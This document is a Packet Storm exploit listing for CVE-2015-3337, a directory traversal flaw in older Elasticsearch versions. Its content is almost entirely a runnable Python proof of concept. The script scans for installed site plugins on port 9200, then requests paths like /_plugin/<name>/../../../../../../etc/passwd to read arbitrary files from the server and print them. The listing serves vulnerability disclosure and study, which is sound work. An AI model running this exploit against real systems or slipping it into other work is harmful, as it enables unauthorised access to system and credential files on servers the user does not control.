packetstorm · John Heasman · PACKETSTORM:131718
History: May 01, 2015 - 12:00 a.m.

ElasticSearch Directory Traversal Proof Of Concept

2015-05-01 00:00:00
John Heasman
packetstormsecurity.com

0.966 High

EPSS

Percentile

99.5%

`#!/usr/bin/python  
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign  
# Affects Elasticsearch before 1.4.5 and 1.5.x before 1.5.2: directory traversal through the  
# /_plugin/<name>/ path, so a site plugin must be installed for the traversal to be reachable  
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net  
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/ (the six "../" in the  
# request path are sized for that layout; another install prefix may need a different count)  
  
import socket, sys  
  
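print("!dSR ElasticPwn - for CVE-2015-3337\n")
# Usage: <script> <host> <absolute file path>.  Same exit-on-bad-arguments
# behaviour as before, written so it also parses on Python 3.
if len(sys.argv) != 3:
    print("Ex: %s www.example.com /etc/passwd" % sys.argv[0])
    sys.exit()

port = 9200  # Default ES http port
host = sys.argv[1]
# The traversal is built as "/_plugin/<name>/../../../../../.." + fpath, so
# fpath has to be absolute; tolerate a target given without the leading "/".
fpath = sys.argv[2]
if not fpath.startswith("/"):
    fpath = "/" + fpath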
  
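def grab(plugin):
    """Fetch ``fpath`` through the traversal path under ``/_plugin/<plugin>/``.

    Sends one HTTP/1.0 GET to the module-level ``host``:``port``, reads the
    whole response (not just the first 2 KiB) and prints it when the status
    code is 200; on any other status the file is reported as not found /
    not vulnerable.  ``plugin`` should be a site plugin already confirmed to
    be installed (see ``pfind``).  The socket is always closed; connection
    errors propagate to the caller as before.
    """
    # Six "../" climb out of <plugins dir>/<plugin>/_site/ on the .deb layout
    # named in the header comment; other install prefixes may need a
    # different depth.
    path = "/_plugin/%s/../../../../../..%s" % (plugin, fpath)
    request = ("GET %s HTTP/1.0\r\n"
               "Host: %s\r\n\r\n") % (path, host)
    print(" [*] Trying to retrieve %s:" % fpath)
    sock = socket.socket()
    sock.settimeout(3)  # per-socket, instead of changing the process-wide default
    try:
        sock.connect((host, port))
        sock.sendall(request.encode("latin-1"))
        # HTTP/1.0 without keep-alive: the server closes after the body, so
        # read until EOF rather than trusting a single recv() to return it all.
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    response = b"".join(chunks)
    # Compare the status code, not the literal "HTTP/1.0 200 OK", so an
    # HTTP/1.1 status line is recognised as well.
    status = response.split(b"\n", 1)[0].split()
    if len(status) >= 2 and status[1] == b"200":
        print("\n" + response.decode("latin-1"))
    else:
        print("[-] File Not Found or system not vulnerable")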
  
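def pfind(plugin):
    """Probe ``/_plugin/<plugin>/`` on ``host``:``port``; on a 200 hand off to
    ``grab`` and exit.

    A 200 here only shows that a site plugin by that name answers; whether
    the traversal actually works is decided by ``grab``.  Only the status
    line is read, so the plugin's index page is never downloaded.  Any
    exception raised while probing or grabbing (refused, timeout, DNS
    failure, reset) is reported and ends the script, as in the original.
    """
    request = ("GET /_plugin/%s/ HTTP/1.0\r\n"
               "Host: %s\r\n\r\n") % (plugin, host)
    print("[*] Trying to find plugin %s:" % plugin)
    try:
        sock = socket.socket()
        sock.settimeout(3)  # per-socket, not the process-wide default
        try:
            sock.connect((host, port))
            sock.sendall(request.encode("latin-1"))
            # A single recv() may return fewer bytes than asked for; keep
            # reading until the status line is complete (bounded at 256 B).
            head = b""
            while b"\n" not in head and len(head) < 256:
                data = sock.recv(256 - len(head))
                if not data:
                    break
                head += data
        finally:
            sock.close()
        # Compare the status code rather than the literal "HTTP/1.0 200 OK".
        status = head.split(b"\n", 1)[0].split()
        if len(status) >= 2 and status[1] == b"200":
            print("[+] Plugin found!")
            grab(plugin)
            sys.exit()  # SystemExit is not an Exception, so it is not swallowed below
        print("[-] Not Found ")
    except Exception as e:
        print("[-] Error connecting to %s %s" % (host, e))
        sys.exit()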
  
# Site plugins to probe, in this order.  pfind() exits the script after the
# first one that answers 200 (and after the grab that follows), so later
# names are only tried when earlier ones are absent.  Add names here to
# cover other installed site plugins.
pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for candidate in pluginList:
    pfind(candidate)
  
  
  
`